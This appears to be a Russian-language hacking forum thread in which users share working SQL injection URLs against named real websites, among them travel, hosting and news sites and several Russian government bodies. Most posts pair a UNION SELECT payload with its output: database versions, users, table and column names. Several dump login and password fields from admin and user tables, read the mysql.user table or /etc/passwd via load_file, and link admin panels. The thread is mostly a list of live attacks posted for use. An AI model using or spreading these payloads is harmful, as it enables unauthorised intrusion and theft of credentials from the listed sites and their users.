SQL Инъекции

http://www.yu-tour.ru/country.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12,13,14,15+from+information_schema.columns+where+table_name=0x6d6f64466565646261636b55736572--
MySQL 5.0.45-log
http://www.yu-tour.ru/country.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,login,0x3a,password),12,13,14,15+from+modFeedbackUser--
modFeedbackUser::id:name:login:,password:,post
http://www.yu-tour.ru/admin
выводит все строки сразу

 

Code:

http://www.graphicjunkiehosting.co.uk/knowledgebase/index.php?cat=1+group+by+1+union+select+1,2,version()/*

 

mssql 2008: http://kbaptupa.ru/dir/linkdetail.aspx?id=764+order+by+6+--



msaccess: http://www.sectsco.org/RU/show.asp?id=304+or+1=1
pr 7 cy 160, оф. сайт шанхайской организации сотрудничества, лол.

 

wargames@localhost:Wargames:5.0.75-0ubuntu10.2

ccg@localhost:CCG:5.0.75-0ubuntu10.2

 

Code:

http://www.alfacomponent.com/index.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),user(),version(),@@version_compile_os),6

alfachip_alfacomponent:alfachip_user@localhost:4.0.27-standardc-linux-gnu
Таблицу не смог найти (

 

theanimatedseries.890m.com -
http://theanimatedseries.890m.com/showcomments.php?postid=1/**/and/**/1=7%20/**/union/**/all/**/select/**/1,version(),3,4,5+from+users--
version - 5.0.81-community
user - a1811734_madnote@localhost
database - a1811734_imanga
table - users (username, password)
http://theanimatedseries.890m.com/showcomments.php?postid=1/**/and/**/1=7%20/**/union/**/all/**/select/**/1,concat_ws(0x3a,username,password),3,4,5+from+users--
admin panel - http://theanimatedseries.890m.com/admin/

 

5.0.21 : rootr@localhost : % : rootr : : Y
http://www.guerreros.com.co/guerreros/popupNoticia.php?noticia=-1+union+select+0,1,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),3,4+from+mysql.user+limit+1,1--
http://www.guerreros.com.co/guerreros/popupNoticia.php?noticia=-1+union+select+0,1,load_file(0x2f6574632f706173737764),3,4--

 

http://www.yoseikan-budo.be/intranet/ViewClub.php?id=-5+union+select+1,2,3,4,5,group_concat(0x0b,column_name),7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x64635f75736572
dc_user::user_id:user_level:user_pwd:user_nom:user_prenom:user_pseudo:user_email:user_post_format:user_edit_size:user_pref_cat:user_lang:user_delta:user_post_pub
MySQL 5.0.32-Debian_7etch11-log
http://www.yoseikan-budo.be/intranet/ViewClub.php?id=-5+union+select+1,2,3,4,5,group_concat(0x0b,user_id,0x3a,user_email,0x3a,user_pwd,0x3a,user_level),7,8,9,10,11,12,13+from+dc_user
softbb_membres::http://www.yoseikan-budo.be/intranet/ViewClub.php?id=-5+union+select+1,2,3,4,5,group_concat(0x0b,column_name),7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0x736f667462625f6d656d62726573

 

http://www.painkillerz.ca/archive.php?type=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+

https://www.magazineburst.com/newsite/magazine.php?mag=-424+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(table_name)+from+information_schema.tables+/*+

http://cosmoguayana.net/galeria_prensa.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,login,contrasena,nombre,apellido,email,tipo,estado),6,7,8,9,10,11+from+usuarios+limit+2,1+--+

http://www.chiroeco.com/article/chiropractic-magazine.php?id=-113+union+select+concat_ws(0x3a3a,username,password,section)+from+administrators+limit+1,10+--+

 

http://yocshoppe.com/viewOrder.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(0x0b,column_name)+from+information_schema.columns+where+table_name=0x6163636f756e7473
accounts::userid:usernameasshash:logouttime:accounttype:contact:comments
http://yocshoppe.com/viewOrder.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(0x0b,username,0x3a,passhash,0x3a,accounttype)+from+accounts
MySQL 5.0.81-log
логинимсо http://yocshoppe.com/loginAccount.php

 

Code:

http://www.nolting.com/article.php?i=999+union+select+1,concat_ws(0x3a,user(),version(),database()),table_name,4+from+information_schema.tables/*

nmdbadmin@localhost:5.0.45-community-nt:nolting

PR: 3

Code:

http://odb.tamboff.ru/index.php?id=-9+union+select+unhex(hex(concat_ws(0x3a,version(),user(),database())))--&place=content

4.1.11:оdb@localhost:оdb

тиц=110

Code:

http://www.ib.ru/news/index.php?id=-999+union+select+1,concat_ws(0x3a,version(),user(),database()),2,3,5,6,7

5.0.45-log:ib@localhost:ibnews

ТИЦ: 425

 

http://www.rusich-media.ru/data.php?mod=data&path=peretagki&num=0&id=4+union+select+1,2,concat_ws(0x3a,user,0x3a,password,0x3a,file_priv),4,5,6,7,8+from+mysql.user
MySQL 5.0.76-log
http://www.rusich-media.ru/data.php?mod=data&path=peretagki&num=0&id=4+union+select+1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8 - Чтение файлов на серве
http://www.rusich-media.ru/admin типа админко

 

Межпарламентская Ассамблея государств - участников Содружества Независимых Государств

Code:

iacis:iacis@localhost:4.1.20

Управление Федеральной регистрационной службы по Пермскому краю

Code:

dbfrs2:frs@localhost:4.0.24_Debian-10sarge3-log

Управление Федеральной миграционной службы
по Пермскому краю

Сибирский Федеральный Округ

ЦЕНТР ОБЩЕСТВЕННОЙ БЕЗОПАСНОСТИ - ЦЕНТУРИОН

Информационное агентство "Федеральные Новости"

 

Проявляю активность! =)

 

Code:

http://www.southveter.ru/catalog.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10+--+

 

тИЦ: 130

Code:

http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6+from+cms_admin

Code:

[B][color="Red"]root[/color][/B]@zvm11:rusconsultru:5.0.77

Code:

http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,login,password),5,6+from+cms_admin

Code:

http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user_login,user_pass),5,6+from+wp_users

Code:

http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user,password),5,6+from+mysql.user

 

зарубежный хостинг :
http://lithium-hosting.net/info.php?item=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),version(),database(),user(),@@version_compile_os),3/**/from/**/plans

version - 5.0.81-community-log
database - lithiumh_lithium
user - lithiumh_lithium@localhost
os - unknown-linux-gnu

http://lithium-hosting.net/info.php?item=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),ftp,domains,link),3/**/from/**/plans

 

пр 5

Code:

http://www.ukrainianjournal.com/index.php?w=article&id=-9174+union+select+1,2,concat_ws(0x3a,id,login,password),4,5,6,7+from+uajournal_db.users--

Database Version: 5.0.85-log
Database name: uajournal_db
User name: [email protected]

 

5.0.82sp1-enterprise-gpl:[email protected]:w3452267db

4.0.27:[email protected]:know_db

5.0.77:hotel_user@localhost:hotel_data

4.1.20izziadmin@localhostizzibs

 

Ребята, а зачем вы все выкладываете это?

Если надо, то вот от меня:

http://www.ovidiopol.com/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6%20--